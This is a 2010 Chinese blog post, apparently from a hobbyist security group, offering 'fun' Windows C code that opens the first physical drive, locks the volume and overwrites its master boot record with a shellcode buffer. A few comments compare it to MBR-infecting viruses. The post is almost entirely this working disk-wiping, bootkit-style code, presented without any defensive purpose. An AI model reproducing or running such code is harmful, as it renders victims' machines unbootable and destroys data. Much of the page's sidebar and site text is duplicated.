发现个好玩的代码改写MBR

Posted by hello world on 2010/07/03 Leave a comment (3) Go to comments

 HANDLE hDevice;
DWORD dwBytesWritten, dwBytesReturned;
BYTE pMBR[512] = {0};
// 重新构造MBR
memcpy(pMBR, scode, sizeof(scode) - 1);

//MBR结束标记55AA
pMBR[510] = 0x55;
pMBR[511] = 0xAA;
//打开磁盘驱动
hDevice = CreateFile
(
"\\\\.\\PHYSICALDRIVE0",
GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL,
OPEN_EXISTING,
0,
NULL
);

if (hDevice == INVALID_HANDLE_VALUE)
return -1;

//锁定卷
DeviceIoControl
(
hDevice,
FSCTL_LOCK_VOLUME,
NULL,
0,
NULL,
0,
&amp;dwBytesReturned,
NULL
);

// 写入内容
WriteFile(hDevice, pMBR, sizeof(pMBR), &amp;dwBytesWritten, NULL);

//解除卷锁定
DeviceIoControl
(
hDevice,
FSCTL_UNLOCK_VOLUME,
NULL,
0,
NULL,
0,
&amp;dwBytesReturned,
NULL
);
CloseHandle(hDevice);

ExitProcess(-1);
return 0;

运行效果

随机日志

所谓技术mbr

← LO**网购物小记

PHP中正则表达式对UNICODE字符码的匹配 →

发表评论

3 Comments.

橙子 2010/07/04 17:43:28

改写MBR的病毒还是比较多的，比如鬼影就是从MBR引导。。。

回复
- CFC4N 2010/07/05 10:44:10
  
  上次你研究的那个，也是鬼影吗？
  
  回复
Tony 2010/07/05 18:55:17

很邪恶，吼吼，有意思。

回复

CNXCT小组的博客

技术这个东西如同一个圆 ,刚开始的时候我们就如同站在圆心,一旦投入学习下去 ,圆就慢慢变大 ,圆的边缘以外也就会越来越大,接触的多了知道的多了, 就会发现自己真的很无知!

发现个好玩的代码改写MBR

随机日志

3 Comments.

Leave a Reply

Categories

我的微博

最新文章

随机博文

Search by Tags!

博文归档

Meta

CNXCT小组的博客

技术这个东西如同一个圆 ,刚开始的时候我们就如同站在圆心,一旦投入学习下去 ,圆就慢慢变大 ,圆的边缘以外也就会越来越大,接触的多了 知道的多了, 就会发现自己真的很无知!

发现个好玩的代码改写MBR

随机日志

3 Comments.

Leave a Reply

Categories

我的微博

最新文章

随机博文

Search by Tags!

博文归档

Meta

技术这个东西如同一个圆 ,刚开始的时候我们就如同站在圆心,一旦投入学习下去 ,圆就慢慢变大 ,圆的边缘以外也就会越来越大,接触的多了知道的多了, 就会发现自己真的很无知!